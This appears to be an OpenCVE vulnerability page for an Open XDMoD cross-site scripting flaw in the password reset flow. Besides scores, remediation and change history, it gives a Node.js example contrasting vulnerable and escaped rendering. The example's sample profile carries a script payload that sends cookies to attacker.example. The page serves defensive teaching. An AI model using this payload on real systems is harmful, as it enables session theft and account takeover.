Description
OpenXDMoD is an open framework for collecting and analyzing HPC metrics. Prior to version 11.0.3, an authenticated attacker can inject malicious JavaScript into their Open XDMoD user profile and abuse the password reset functionality to email a link to an HTML page, which when visited by the victim, reflects and executes the unsanitized payload in the victim's browser, potentially leading to credential capture and Open XDMoD account takeover. All deployments of Open XDMoD prior to 11.0.3 are impacted. This issue was reported privately on 2026-04-06, and at this time there is no evidence that this vulnerability has been exploited in the wild. The vulnerability was patched in Open XDMoD 11.0.3 on 2026-05-12. As a workaround, apply the patch manually.
Published: 2026-06-05
Score: 8.6 High
EPSS: < 1% Very Low
KEV: No
AI Analysis

Impact

An authenticated attacker can store malicious JavaScript in their own Open XDMoD user profile. By abusing the password reset function, the attacker causes Open XDMoD to email a link to an HTML page. When a victim opens that link, the page reflects the unsanitized profile data and the payload executes in the victim's browser, which can lead to credential theft and takeover of the victim's Open XDMoD account.

Affected Systems

All Open XDMoD deployments running a version earlier than 11.0.3 are affected. Open XDMoD is developed by the University at Buffalo's Center for Computational Research and is tracked here under the vendor names Ubccr (the project's GitHub organization) and Buffalo (NVD CPE cpe:2.3:a:buffalo:open_xdmod).

Risk and Exploitability

The vulnerability carries a CVSS v4.0 base score of 8.6 (High) as published by the assigning CNA; the CVSS v3.1 assessment added on 2026-06-10 scores the same flaw 5.4 (Medium), the usual v3.1 result for a cross-site scripting bug that needs a credentialed attacker and victim interaction. It is not listed in CISA's KEV catalog, and EPSS puts the probability of exploitation below 1%. The flaw lets an authenticated user mount a reflected XSS attack with the potential for account takeover; no exploitation in the wild has been reported. The fix, released in Open XDMoD 11.0.3 on 2026-05-12, addresses the unsanitized handling of user profile data in the password reset flow.

Generated by OpenCVE AI on June 5, 2026 at 22:06 UTC.

Remediation

Fixed in Open XDMoD 11.0.3, released 2026-05-12. For deployments that cannot upgrade immediately, the vendor's stated workaround is to apply the fix as a manual patch.

OpenCVE Recommended Actions

  • Apply the Open XDMoD 11.0.3 patch or later release to remove the vulnerable logic.
  • If an upgrade cannot occur immediately, disable or restrict the password reset feature until the patch is applied.
  • Ensure that all user profile input fields are properly sanitized so that script payloads cannot be stored or reflected.

Generated by OpenCVE AI on June 5, 2026 at 22:06 UTC.
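To make the weakness class and the third recommendation above concrete, the following Node.js snippet is an added example written for this page, not Open XDMoD's source. It shows a hypothetical server-side renderer for a password-reset page that embeds stored profile data, first as written vulnerably (untrusted data concatenated into markup, so whatever was saved in the profile is reflected to whoever opens the page) and then hardened with context-aware output encoding plus input validation as defence in depth. The function names, the profile record and the payload inside it are all constructed for illustration; the payload is generic XSS material and not the vector reported for this CVE.

```javascript
// Added example for this page, not Open XDMoD source. A hypothetical server-side
// renderer for a password-reset page that embeds stored profile data, shown first
// as written vulnerably and then hardened with context-aware output encoding.

// Constructed profile record. The display name carries a generic, illustrative
// XSS payload; it is not the vector reported for this CVE.
const PROFILE = {
  username: 'jdoe',
  displayName: 'J. Doe<script>new Image().src="https://attacker.example/c?"+encodeURIComponent(document.cookie)</script>',
  resetToken: 'example-token-not-real',
};

// Vulnerable: untrusted profile data is concatenated straight into the markup,
// so a stored payload is reflected into the page exactly as the attacker saved it.
function renderResetPageUnsafe(profile) {
  return '<html><body>\n' +
    '<h1>Password reset for ' + profile.displayName + '</h1>\n' +
    '<a href="/reset?token=' + profile.resetToken + '">Continue</a>\n' +
    '</body></html>';
}

// Encode for the HTML text and attribute contexts: every character that can open
// a tag, close an attribute or start an entity becomes an entity reference.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;' };
  return String(value).replace(/[&<>"'\/]/g, (c) => map[c]);
}

// Hardened: encode at the point of output, with the encoder matching each context
// (HTML text for the name, URL encoding for the token that lands in a query string).
function renderResetPageSafe(profile) {
  return '<html><body>\n' +
    '<h1>Password reset for ' + escapeHtml(profile.displayName) + '</h1>\n' +
    '<a href="/reset?token=' + encodeURIComponent(profile.resetToken) + '">Continue</a>\n' +
    '</body></html>';
}

// Defence in depth on the input side: a display name has no legitimate need for
// markup characters, so reject them at save time. Output encoding stays mandatory,
// because other fields and other pages may not share this restriction.
function isAcceptableDisplayName(name) {
  return typeof name === 'string' && name.length <= 64 && !/[<>"'&]/.test(name);
}

// Quick check a tester can run over rendered output: does a raw <script> tag survive?
function containsRawScriptTag(html) {
  return /<script\b/i.test(html);
}

console.log(containsRawScriptTag(renderResetPageUnsafe(PROFILE))); // true
console.log(containsRawScriptTag(renderResetPageSafe(PROFILE)));   // false
```

The check at the end is deliberately crude; a real review would render the page in a browser or pass it through an HTML parser, since payloads need not use a literal script tag (event handler attributes, javascript: URLs and broken-out attributes are all in scope for CWE-79). The fix that matters is the encoder being applied at every output point for the context the value lands in.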

Advisories

No advisories yet.

History

Wed, 10 Jun 2026 21:15:00 +0000

Type                 Values Removed   Values Added
First Time appeared  -                Buffalo; Buffalo open Xdmod
CPEs                 -                cpe:2.3:a:buffalo:open_xdmod:*:*:*:*:*:*:*:*
Vendors & Products   -                Buffalo; Buffalo open Xdmod
Metrics              -                cvssV3_1 {'score': 5.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}

Mon, 08 Jun 2026 16:30:00 +0000

Type                 Values Removed   Values Added
Metrics              -                ssvc {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Sun, 07 Jun 2026 11:30:00 +0000

Type                 Values Removed   Values Added
First Time appeared  -                Ubccr; Ubccr xdmod
Vendors & Products   -                Ubccr; Ubccr xdmod

Fri, 05 Jun 2026 20:15:00 +0000

Type                 Values Removed   Values Added
Description          -                OpenXDMoD is an open framework for collecting and analyzing HPC metrics. Prior to version 11.0.3, an authenticated attacker can inject malicious JavaScript into their Open XDMoD user profile and abuse the password reset functionality to email a link to an HTML page, which when visited by the victim, reflects and executes the unsanitized payload in the victim's browser, potentially leading to credential capture and Open XDMoD account takeover. All deployments of Open XDMoD prior to 11.0.3 are impacted. This issue was reported privately on 2026-04-06, and at this time there is no evidence that this vulnerability has been exploited in the wild. The vulnerability was patched in Open XDMoD 11.0.3 on 2026-05-12. As a workaround, apply the patch manually.
Title                -                Open XDMoD Vulnerable to Reflected Cross-Site Scripting (XSS) in Password Reset
Weaknesses           -                CWE-79
References           -
Metrics              -                cvssV4_0 {'score': 8.6, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N'}

MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-06-08T15:45:28.993Z

Reserved: 2026-05-13T07:45:21.251Z

Link: CVE-2026-45778

Vulnrichment

Updated: 2026-06-08T15:45:15.690Z

NVD

Status : Analyzed

Published: 2026-06-05T20:17:32.857

Modified: 2026-06-10T21:05:23.903

Link: CVE-2026-45778

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-06-07T11:15:55Z

Weaknesses
  • CWE-79

    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')